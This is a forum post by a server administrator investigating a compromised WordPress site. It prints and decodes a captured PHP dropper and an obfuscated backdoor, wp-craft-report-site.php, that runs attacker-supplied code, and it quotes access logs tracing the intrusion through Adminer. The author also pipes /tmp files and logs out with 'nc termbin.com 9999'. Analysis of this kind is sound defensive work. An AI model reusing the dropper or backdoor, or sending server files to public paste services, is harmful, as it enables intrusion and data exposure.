WordPress infected wp-craft-report-site.php adminer

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
First, what am I doing?

Code:
cd /tmp/
cat * | nc termbin.com 9999

Taking this off to another machine for inspection, volatile data:

Code:
a:2:{s:14:"162.158.89.172";a:2:{i:0;i:1577805458;i:1;i:1;}s:14:"162.158.91.230";a:2:{i:0;i:1577805459;i:1;i:1;}}<?php echo ":#009009#:";

// Dropper: walks DOCUMENT_ROOT plus the attacker-supplied ?ptz= suffix looking
// for sitemap.xml files, derives each site's URL from them and plants
// wp-craft-report-site.php next to every one it finds.
$file_to_search = "sitemap.xml";

$dop = $_GET['ptz'];

@search_file($_SERVER['DOCUMENT_ROOT'].$dop,$file_to_search);

function search_file($dir,$file_to_search){

    $search_array = array();

    $files = scandir($dir);

    foreach($files as $key => $value){

        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false) {

                $sitename = get_sitename($path);

                if($sitename != "null") {

                    if (!array_key_exists($sitename, $search_array)) {
                        $st = make_sh_site(dirname($path),$sitename);
                        array_push($search_array, $sitename);
                    }

                }

            }

        } else if($value != "." && $value != "..") {

            search_file($path, $file_to_search);

        }
    }

}

// Pulls the first <loc> URL out of a sitemap and keeps only scheme://host.
function get_sitename($file) {

    $g = file_get_contents($file);

    if (strpos($g,"<loc>") !== false) {

        preg_match('/<loc>(.*?)<\/loc>/s', $g, $matches, PREG_OFFSET_CAPTURE);
        $siten = $matches[1][0];
        $siten_t = str_replace("://","@",$siten);
        $pieces = explode("/", $siten_t);
        $siten_t3 = str_replace("@","://",$pieces[0]);
        return $siten_t3;

    }

    return "null";

}

// Writes the base64-encoded shell beside the sitemap, then fetches it over HTTP
// to confirm it executes (the shell answers "404--error" when called without credentials).
function make_sh_site($dir,$site_name) {

    @file_put_contents($dir."/wp-craft-report-site.php",base64_decode('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'));

    $r = @file_get_contents($site_name."/wp-craft-report-site.php");
    if(strpos($r,"404--error") !== false){
        echo $site_name."/wp-craft-report-site.php<#>";
        return;

    }

    return $site_name;

}

echo "#already exist#:";



Okay, now I am not a dumb mother fuXXr - right? I know to grep for "decode" among "eval" and other kiddo commands.



So, I am looking at wp-craft-report-site.php with the base64. Let's decode?

Code:
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



Base64 decodes to:

Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110);     $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1;     $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);     $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]);     $z3 = $b2($_REQUEST[chr(100).chr(49)]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }



Awesome, more obfuscation.



Now we want to turn all these damn chr(1337)s to their actual character. Cool! Nice site over here does this stuff for us: https://www.plus2net.com/php_tutorial/string-chr.php



This is going to get fucking dumb.



Time 2 code PHP to create a bash script for us, lmao.. because fuck this.



Over here http://www.writephponline.com/ I am going to execute:



PHP:
<?php
// Print a chr(N) -> character lookup table, 20 entries per column.
// htmlspecialchars() keeps < > & " from being swallowed by the browser
// (otherwise chr(60) and chr(61) silently vanish from the table).
echo "<table><tr><td>";
for ($i = 0; $i <= 127; $i++) {
    echo " chr($i) = " . htmlspecialchars(chr($i)) . "<br>";
    if ($i % 20 == 0 and $i > 19) { echo "</td><td valign=top>"; }
}
echo "</td></tr></table>";
?>



Write your php you want to decode into a decode.txt file!



We can generate this by modifying:

Code:
sed -i 's/chr(0)//g' ./decode.txt
sed -i 's/chr(1)//g' ./decode.txt
sed -i 's/chr(2)//g' ./decode.txt
sed -i 's/chr(3)//g' ./decode.txt
sed -i 's/chr(4)//g' ./decode.txt
sed -i 's/chr(5)//g' ./decode.txt
sed -i 's/chr(6)//g' ./decode.txt
sed -i 's/chr(7)//g' ./decode.txt
sed -i 's/chr(8)//g' ./decode.txt
sed -i 's/chr(9)/ /g' ./decode.txt
sed -i 's/chr(10)/ /g' ./decode.txt
sed -i 's/chr(11)//g' ./decode.txt
sed -i 's/chr(12)//g' ./decode.txt
sed -i 's/chr(13)/ /g' ./decode.txt
sed -i 's/chr(14)//g' ./decode.txt
sed -i 's/chr(15)//g' ./decode.txt
sed -i 's/chr(16)//g' ./decode.txt
sed -i 's/chr(17)//g' ./decode.txt
sed -i 's/chr(18)//g' ./decode.txt
sed -i 's/chr(19)//g' ./decode.txt
sed -i 's/chr(20)//g' ./decode.txt
sed -i 's/chr(21)//g' ./decode.txt
sed -i 's/chr(22)//g' ./decode.txt
sed -i 's/chr(23)//g' ./decode.txt
sed -i 's/chr(24)//g' ./decode.txt
sed -i 's/chr(25)//g' ./decode.txt
sed -i 's/chr(26)//g' ./decode.txt
sed -i 's/chr(27)//g' ./decode.txt
sed -i 's/chr(28)//g' ./decode.txt
sed -i 's/chr(29)//g' ./decode.txt
sed -i 's/chr(30)//g' ./decode.txt
sed -i 's/chr(31)//g' ./decode.txt
sed -i 's/chr(32)/ /g' ./decode.txt
sed -i 's/chr(33)/!/g' ./decode.txt
sed -i 's/chr(34)/"/g' ./decode.txt
sed -i 's/chr(35)/#/g' ./decode.txt
sed -i 's/chr(36)/$/g' ./decode.txt
sed -i 's/chr(37)/%/g' ./decode.txt
sed -i 's/chr(38)/\&/g' ./decode.txt
sed -i "s/chr(39)/'/g" ./decode.txt
sed -i 's/chr(40)/(/g' ./decode.txt
sed -i 's/chr(41)/)/g' ./decode.txt
sed -i 's/chr(42)/*/g' ./decode.txt
sed -i 's/chr(43)/+/g' ./decode.txt
sed -i 's/chr(44)/,/g' ./decode.txt
sed -i 's/chr(45)/-/g' ./decode.txt
sed -i 's/chr(46)/./g' ./decode.txt
sed -i 's/chr(47)/\//g' ./decode.txt
sed -i 's/chr(48)/0/g' ./decode.txt
sed -i 's/chr(49)/1/g' ./decode.txt
sed -i 's/chr(50)/2/g' ./decode.txt
sed -i 's/chr(51)/3/g' ./decode.txt
sed -i 's/chr(52)/4/g' ./decode.txt
sed -i 's/chr(53)/5/g' ./decode.txt
sed -i 's/chr(54)/6/g' ./decode.txt
sed -i 's/chr(55)/7/g' ./decode.txt
sed -i 's/chr(56)/8/g' ./decode.txt
sed -i 's/chr(57)/9/g' ./decode.txt
sed -i 's/chr(58)/:/g' ./decode.txt
sed -i 's/chr(59)/;/g' ./decode.txt
sed -i 's/chr(60)/</g' ./decode.txt
sed -i 's/chr(61)/=/g' ./decode.txt
sed -i 's/chr(62)/>/g' ./decode.txt
sed -i 's/chr(63)/?/g' ./decode.txt
sed -i 's/chr(64)/@/g' ./decode.txt
sed -i 's/chr(65)/A/g' ./decode.txt
sed -i 's/chr(66)/B/g' ./decode.txt
sed -i 's/chr(67)/C/g' ./decode.txt
sed -i 's/chr(68)/D/g' ./decode.txt
sed -i 's/chr(69)/E/g' ./decode.txt
sed -i 's/chr(70)/F/g' ./decode.txt
sed -i 's/chr(71)/G/g' ./decode.txt
sed -i 's/chr(72)/H/g' ./decode.txt
sed -i 's/chr(73)/I/g' ./decode.txt
sed -i 's/chr(74)/J/g' ./decode.txt
sed -i 's/chr(75)/K/g' ./decode.txt
sed -i 's/chr(76)/L/g' ./decode.txt
sed -i 's/chr(77)/M/g' ./decode.txt
sed -i 's/chr(78)/N/g' ./decode.txt
sed -i 's/chr(79)/O/g' ./decode.txt
sed -i 's/chr(80)/P/g' ./decode.txt
sed -i 's/chr(81)/Q/g' ./decode.txt
sed -i 's/chr(82)/R/g' ./decode.txt
sed -i 's/chr(83)/S/g' ./decode.txt
sed -i 's/chr(84)/T/g' ./decode.txt
sed -i 's/chr(85)/U/g' ./decode.txt
sed -i 's/chr(86)/V/g' ./decode.txt
sed -i 's/chr(87)/W/g' ./decode.txt
sed -i 's/chr(88)/X/g' ./decode.txt
sed -i 's/chr(89)/Y/g' ./decode.txt
sed -i 's/chr(90)/Z/g' ./decode.txt
sed -i 's/chr(91)/[/g' ./decode.txt
sed -i 's/chr(92)/\\/g' ./decode.txt
sed -i 's/chr(93)/]/g' ./decode.txt
sed -i 's/chr(94)/^/g' ./decode.txt
sed -i 's/chr(95)/_/g' ./decode.txt
sed -i 's/chr(96)/`/g' ./decode.txt
sed -i 's/chr(97)/a/g' ./decode.txt
sed -i 's/chr(98)/b/g' ./decode.txt
sed -i 's/chr(99)/c/g' ./decode.txt
sed -i 's/chr(100)/d/g' ./decode.txt
sed -i 's/chr(101)/e/g' ./decode.txt
sed -i 's/chr(102)/f/g' ./decode.txt
sed -i 's/chr(103)/g/g' ./decode.txt
sed -i 's/chr(104)/h/g' ./decode.txt
sed -i 's/chr(105)/i/g' ./decode.txt
sed -i 's/chr(106)/j/g' ./decode.txt
sed -i 's/chr(107)/k/g' ./decode.txt
sed -i 's/chr(108)/l/g' ./decode.txt
sed -i 's/chr(109)/m/g' ./decode.txt
sed -i 's/chr(110)/n/g' ./decode.txt
sed -i 's/chr(111)/o/g' ./decode.txt
sed -i 's/chr(112)/p/g' ./decode.txt
sed -i 's/chr(113)/q/g' ./decode.txt
sed -i 's/chr(114)/r/g' ./decode.txt
sed -i 's/chr(115)/s/g' ./decode.txt
sed -i 's/chr(116)/t/g' ./decode.txt
sed -i 's/chr(117)/u/g' ./decode.txt
sed -i 's/chr(118)/v/g' ./decode.txt
sed -i 's/chr(119)/w/g' ./decode.txt
sed -i 's/chr(120)/x/g' ./decode.txt
sed -i 's/chr(121)/y/g' ./decode.txt
sed -i 's/chr(122)/z/g' ./decode.txt
sed -i 's/chr(123)/{/g' ./decode.txt
sed -i 's/chr(124)/|/g' ./decode.txt
sed -i 's/chr(125)/}/g' ./decode.txt
sed -i 's/chr(126)/~/g' ./decode.txt
sed -i 's/chr(127)//g' ./decode.txt



Code:
<?php
// Emit one sed substitution per ASCII code so that chr(N) becomes the literal
// character. sed's replacement-side metacharacters (\ / &) are escaped and the
// single quote is wrapped in double quotes instead. Run from the CLI and
// redirect the output to a script file.
for ($i = 0; $i <= 127; $i++) {
    $c = chr($i);
    if ($i < 32 || $i == 127) {
        // control characters: keep tab/LF/CR as a space, drop the rest
        $c = in_array($i, array(9, 10, 13)) ? ' ' : '';
    }
    $c = str_replace(array('\\', '/', '&'), array('\\\\', '\/', '\&'), $c);
    $q = ($c === "'") ? '"' : "'";
    echo "sed -i {$q}s/chr($i)/{$c}/g{$q} ./decode.txt\n";
}
?>



Ghetttttoo PHP shytufff for fun, woo.



Results?



Code:
cat decode.txt
<?php if(isset($_POST[a.s.a.v.s.d.v.d.s]) && md5($_POST[l.g.k.f.g.h.d.f.h]) == e.9.7.8.7.a.d.c.5.2.7.1.c.b.0.f.7.6.5.2.9.4.5.0.3.d.a.3.f.2.d.c) { $a = m.n;     $n1 = f.i.l.e._;$n2 = p.u.t._;$n3 = $n1.$n2.c.o.n.t.e.n.t.s;$b1 = d.e.c.o.d.e;$b2 = b.a.s.e.6.4._.$b1;     $z1 = chr(60).?.p.h.p. ;     $z2 = $z1.$b2($_REQUEST[d.1]);     $z3 = $b2($_REQUEST[d.1]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47).t.m.p.chr(47).$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = b.a.s.e.6.4._.d.e.c.o.d.e; echo $cbb(N.D.A.0.L.S.1.l.c.n.J.v.c.g.chr(61).chr(61)); }



Just about every usage of "." is for combining the chr(1).chr(2) shit. Know what I should have done first? Remove "." anywhere between ) and c, fuck. Regex for the win.



I don't have patience for regex, so I am using Notepad++ to search for and replace "." with "" nothing.



Code:
<?php if(isset($_POST[asavsdvds]) && md5($_POST[lgkfghdfh]) == e9787adc5271cb0f765294503da3f2dc) { $a = mn;     $n1 = file_;$n2 = put_;$n3 = $n1$n2contents;$b1 = decode;$b2 = base64_$b1;     $z1 = chr(60)?php ;     $z2 = $z1$b2($_REQUEST[d1]);     $z3 = $b2($_REQUEST[d1]);     @$n3($a,$z2);     @include($a);@unlink($a);     $a = chr(47)tmpchr(47)$a;     @$n3($a,$z2);     @include($a);@unlink($a);die();  } else { $cbb = base64_decode; echo $cbb(NDA0LS1lcnJvcgchr(61)chr(61)); }



Apparently Ben from Sucuri already found this shit:




I found a piece of this artifact over at:

Code:
./wp-content/cache/supercache/MY_CLIENTS_WEB_DOMAIN.com/wp-craft-report.php







What about running processes?

Code:
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2019 ?        00:02:34 init [2]
root         2     0  0  2019 ?        00:00:00 [kthreadd]
root         3     2  0  2019 ?        00:06:41 [ksoftirqd/0]
root         5     2  0  2019 ?        00:00:00 [kworker/u:0]
root         6     2  0  2019 ?        00:00:00 [migration/0]
root         7     2  0  2019 ?        00:01:07 [watchdog/0]
root         8     2  0  2019 ?        00:00:00 [cpuset]
root         9     2  0  2019 ?        00:00:00 [khelper]
root        10     2  0  2019 ?        00:00:00 [kdevtmpfs]
root        11     2  0  2019 ?        00:00:00 [netns]
root        12     2  0  2019 ?        00:00:33 [sync_supers]
root        13     2  0  2019 ?        00:00:00 [bdi-default]
root        14     2  0  2019 ?        00:00:00 [kintegrityd]
root        15     2  0  2019 ?        00:00:00 [kblockd]
root        17     2  0  2019 ?        00:00:05 [khungtaskd]
root        18     2  0  2019 ?        00:00:03 [kswapd0]
root        19     2  0  2019 ?        00:00:00 [vmstat]
root        20     2  0  2019 ?        00:00:00 [ksmd]
root        21     2  0  2019 ?        00:00:00 [khugepaged]
root        22     2  0  2019 ?        00:00:00 [fsnotify_mark]
root        23     2  0  2019 ?        00:00:00 [crypto]
root        84     2  0  2019 ?        00:00:00 [khubd]
root        94     2  0  2019 ?        00:00:00 [ata_sff]
root       110     2  0  2019 ?        00:00:00 [scsi_eh_0]
root       111     2  0  2019 ?        00:00:00 [scsi_eh_1]
root       118     2  0  2019 ?        00:00:00 [kworker/u:1]
root       140     2  0  2019 ?        00:03:28 [kjournald]
root       295     1  0  2019 ?        00:00:00 udevd --daemon
root       401   295  0  2019 ?        00:00:00 udevd --daemon
root       402   295  0  2019 ?        00:00:00 udevd --daemon
root       404     2  0  2019 ?        00:00:00 [kpsmoused]
root       418     2  0  2019 ?        00:23:01 [vballoon]
root      1812     1  0  2019 ?        00:11:54 /usr/sbin/rsyslogd -c5
root      1897     2  0  2019 ?        00:01:13 [flush-254:0]
root      1903     1  0  2019 ?        00:00:37 /usr/sbin/cron
root      2357     1  0  2019 ?        00:06:32 sendmail: MTA: accepting connections
root      2593     1  0  2019 ?        00:08:25 /usr/sbin/sshd
root      2617     1  0  2019 tty1     00:00:00 /sbin/getty 38400 tty1
root      2618     1  0  2019 tty2     00:00:00 /sbin/getty 38400 tty2
root      2619     1  0  2019 tty3     00:00:00 /sbin/getty 38400 tty3
root      2620     1  0  2019 tty4     00:00:00 /sbin/getty 38400 tty4
root      2621     1  0  2019 tty5     00:00:00 /sbin/getty 38400 tty5
root      2622     1  0  2019 tty6     00:00:00 /sbin/getty 38400 tty6
root      5321     1  0  2019 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql     5648  5321  0  2019 ?        01:06:55 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      5649  5321  0  2019 ?        00:00:00 logger -t mysqld -p daemon.error
root     31247     1  0 Jan04 ?        00:02:37 /usr/sbin/apache2 -k start
www-data 23249 31247  0 Feb04 ?        00:00:14 /usr/sbin/apache2 -k start
www-data 24323 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start
www-data 27536 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start
www-data 27569 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start
www-data 27571 31247  0 Feb04 ?        00:00:09 /usr/sbin/apache2 -k start
www-data 27572 31247  0 Feb04 ?        00:00:08 /usr/sbin/apache2 -k start
www-data 27574 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start
www-data 27576 31247  0 Feb04 ?        00:00:11 /usr/sbin/apache2 -k start
www-data 27579 31247  0 Feb04 ?        00:00:10 /usr/sbin/apache2 -k start
www-data 29049 31247  0 Feb04 ?        00:00:07 /usr/sbin/apache2 -k start
root     16761     2  0 Feb05 ?        00:00:04 [kworker/0:0]
root     25372     2  0 Feb06 ?        00:00:02 [kworker/0:1]
root     13393  2593  0 13:43 ?        00:00:01 sshd: root@pts/0
root     13401 13393  0 13:43 pts/0    00:00:02 -bash
root     14266 13401  0 14:16 pts/0    00:00:00 mail
root     14371 13401  0 14:20 pts/0    00:00:00 ps -ef --sort=start_time
root     14372 13401  0 14:20 pts/0    00:00:00 nc termbin.com 9999



Pay close attention to this Feb04/05/06 shit.. hmm. kk



Code:
cd /var/log



Now who has logged in?

Code:
grep -rnw './' -e 'Accepted password'



Nice m8, but what about inside of the zipped files?

Code:
root@vps91709:/var/log# zgrep -a Feb *gz | grep -v "root" | grep -v "sendmail" | grep -v "STARTTLS" | grep -v "localhost" | grep -v "CUSTOMER_NAME_HERE" | grep -v "mailer" | grep "kernel"
syslog.3.gz:Feb  4 12:56:34 vps91709 kernel: [11316599.087732] UDP: bad checksum. From 51.255.109.163:53592 to 158.69.206.75:5060 ulen 237



Hey, fuck you UDP protocol packet fuqqer.



Code:
-rw-r--r-- 1 www-data www-data 3.3K Feb 3 16:09 mn



We have a timeframe: our compromise began on Feb 3.



Now since I know this attack happened around a specific time, I can scrape my logs around then:

Code:
cat * | grep "03/Feb/2020:16:09" | nc termbin.com 9999



We know this hit my Apache server, so let's cd in there before running the above: "cd /var/log/apache2", then run the above.



Code:
162.158.74.102 - - [03/Feb/2020:16:09:19 -0500] "GET / HTTP/1.1" 200 6634 "-" "-"
108.162.216.45 - - [03/Feb/2020:16:09:20 -0500] "GET / HTTP/1.1" 200 6630 "-" "-"
162.158.74.246 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6653 "-" "-"
108.162.216.81 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
108.162.216.131 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6646 "-" "-"
162.158.74.134 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
162.158.74.250 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6631 "-" "-"
162.158.74.66 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6641 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:30 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
::1 - - [03/Feb/2020:16:09:31 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "GET /wp-login.php HTTP/1.1" 200 2265 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "POST /wp-login.php HTTP/1.1" 200 2659 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
141.101.104.224 - - [03/Feb/2020:16:09:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
172.69.55.163 - - [03/Feb/2020:16:09:56 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
172.69.55.79 - - [03/Feb/2020:16:09:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:58 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
163.172.44.118 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"
108.162.229.179 - - [03/Feb/2020:16:09:59 -0500] "GET / HTTP/1.1" 200 6645 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0 Safari/537.36 Firefox/66.0"



This fuqqer infected me last time, and I overlooked this infection clearing it off.







See this bullshit?

Now we know Dec 10 17:07 is a time of interest..



Code:
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /admin



I am tracing this attack back to Cloudflare, but this is not Cloudflare's fault; this is my own damn fault for not enabling the Cloudflare module to have the attacker's real fuqqqking IP logged. I know they're around/from the Germany/Netherlands/Europe region though, since the CDN location they came through points that direction.



So I am going to grep for "172.69" and "162.158":

Code:
zgrep -a "10/Dec/2019:17:0" *gz | grep "172.69"

and

Code:
zgrep -a "10/Dec/2019:17:0" *gz | grep "162.158"



I am obviously going to add "| nc termbin.com 9999" to exfil these logs.



Code:
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:30 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:33 -0500] "GET /adminer-4.2.5.php?server=localhost&username=root&&sql= HTTP/1.1" 200 2541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:35 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:43 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:43 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:43 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:44 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:47 -0500] "POST /wp-login.php HTTP/1.1" 200 2556 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:48 -0500] "GET /wp-admin/profile.php HTTP/1.1" 200 12877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:49 -0500] "GET / HTTP/1.1" 206 6147 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
